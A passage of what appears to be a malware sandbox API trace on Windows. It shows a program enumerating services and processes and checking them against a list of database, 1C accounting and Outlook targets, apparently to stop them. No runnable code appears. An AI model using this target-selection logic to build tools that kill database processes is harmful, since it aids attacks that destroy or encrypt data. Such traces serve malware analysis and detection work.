(lpString="Power") returned 5 [0260.642] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0260.642] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0260.642] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0260.642] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0260.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0260.643] lstrlenW (lpString="ProfSvc") returned 7 [0260.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0260.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0260.643] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0260.643] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0260.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0260.643] lstrlenW (lpString="RpcEptMapper") returned 12 [0260.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0260.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0260.643] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0260.643] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0260.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0260.643] lstrlenW (lpString="RpcSs") returned 5 [0260.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0260.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0260.643] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0260.643] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0260.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0260.643] lstrlenW (lpString="SamSs") returned 5 [0260.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0260.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0260.643] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0260.643] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0260.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0260.643] lstrlenW (lpString="Schedule") returned 8 [0260.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0260.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0260.643] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0260.643] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0260.643] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0260.643] lstrlenW (lpString="SENS") returned 4 [0260.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0260.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0260.644] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0260.644] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0260.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0260.644] lstrlenW (lpString="ShellHWDetection") returned 16 [0260.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0260.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0260.644] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0260.644] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0260.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0260.644] lstrlenW (lpString="Spooler") returned 7 [0260.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0260.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0260.644] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0260.644] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0260.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0260.644] lstrlenW (lpString="SysMain") returned 7 [0260.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0260.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0260.644] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0260.644] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0260.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0260.644] lstrlenW (lpString="Themes") returned 6 [0260.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0260.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0260.644] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0260.644] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0260.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0260.644] lstrlenW (lpString="TrkWks") returned 6 [0260.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0260.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0260.644] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0260.644] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0260.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0260.644] lstrlenW (lpString="UxSms") returned 5 [0260.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0260.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0260.645] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0260.645] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0260.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0260.645] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0260.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e8 [0260.646] Process32FirstW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.646] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.646] lstrlenW (lpString="System") returned 6 [0260.646] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0260.646] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0260.646] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0260.646] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0260.646] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0260.647] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0260.647] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0260.647] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.647] lstrlenW (lpString="smss.exe") returned 8 [0260.647] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0260.647] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.647] lstrlenW (lpString="csrss.exe") returned 9 [0260.647] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0260.647] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0260.647] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0260.647] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0260.647] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0260.648] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0260.648] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.648] lstrlenW (lpString="wininit.exe") returned 11 [0260.648] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0260.648] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0260.648] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0260.648] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0260.648] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0260.648] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0260.648] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0260.648] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.648] lstrlenW (lpString="csrss.exe") returned 9 [0260.648] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0260.648] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0260.648] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0260.648] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0260.648] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0260.648] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0260.648] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0260.648] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.649] lstrlenW (lpString="winlogon.exe") returned 12 [0260.649] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0260.649] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0260.649] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0260.649] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0260.649] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0260.649] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0260.649] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0260.649] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.649] lstrlenW (lpString="services.exe") returned 12 [0260.649] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0260.649] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0260.649] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0260.649] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0260.649] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0260.649] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0260.649] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0260.649] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.650] lstrlenW (lpString="lsass.exe") returned 9 [0260.650] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0260.650] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0260.650] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0260.650] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0260.650] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0260.650] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0260.650] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0260.650] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0260.650] lstrlenW (lpString="lsm.exe") returned 7 [0260.650] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0260.650] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0260.650] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0260.650] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0260.650] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0260.650] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0260.650] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0260.650] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.651] lstrlenW (lpString="svchost.exe") returned 11 [0260.651] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.651] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.651] lstrlenW (lpString="svchost.exe") returned 11 [0260.651] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.651] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.651] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.651] lstrlenW (lpString="svchost.exe") returned 11 [0260.651] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0260.652] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0260.652] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0260.652] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0260.652] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0260.652] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0260.652] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0260.652] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.652] lstrlenW (lpString="svchost.exe") returned 11 [0260.652] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.652] lstrlenW (lpString="svchost.exe") returned 11 [0260.652] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0260.653] lstrlenW (lpString="audiodg.exe") returned 11 [0260.653] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.653] lstrlenW (lpString="svchost.exe") returned 11 [0260.653] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.653] lstrlenW (lpString="svchost.exe") returned 11 [0260.653] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0260.653] lstrlenW (lpString="userinit.exe") returned 12 [0260.653] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.654] lstrlenW (lpString="dwm.exe") returned 7 [0260.654] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.654] lstrlenW (lpString="explorer.exe") returned 12 [0260.654] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.654] lstrlenW (lpString="spoolsv.exe") returned 11 [0260.654] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0260.655] lstrlenW (lpString="taskhost.exe") returned 12 [0260.655] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.655] lstrlenW (lpString="svchost.exe") returned 11 [0260.655] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0260.655] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0260.655] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0260.655] lstrlenW (lpString="reader_sl.exe") returned 13 [0260.655] Process32NextW (in: hSnapshot=0x3e8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0260.656] CloseHandle (hObject=0x3e8) returned 1 [0260.656] Sleep (dwMilliseconds=0x1f4) [0261.697] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea4c0 [0261.701] EnumServicesStatusExW (in: hSCManager=0x47ea4c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0261.701] GetLastError () returned 0xea [0261.701] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xd68) returned 0x3dec5a0 [0261.701] EnumServicesStatusExW (in: hSCManager=0x47ea4c0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xd68, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0261.701] CloseServiceHandle (hSCObject=0x47ea4c0) returned 1 [0261.702] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0261.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0261.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0261.702] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0261.702] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0261.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0261.702] lstrlenW (lpString="AudioSrv") returned 8 [0261.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0261.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0261.702] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0261.702] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0261.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0261.702] lstrlenW (lpString="BFE") returned 3 [0261.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0261.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0261.702] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0261.702] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0261.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0261.702] lstrlenW (lpString="CryptSvc") returned 8 [0261.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0261.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0261.702] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0261.702] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0261.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0261.702] lstrlenW (lpString="CscService") returned 10 [0261.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0261.702] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0261.702] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0261.702] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0261.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0261.702] lstrlenW (lpString="DcomLaunch") returned 10 [0261.702] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0261.703] lstrcmpiW 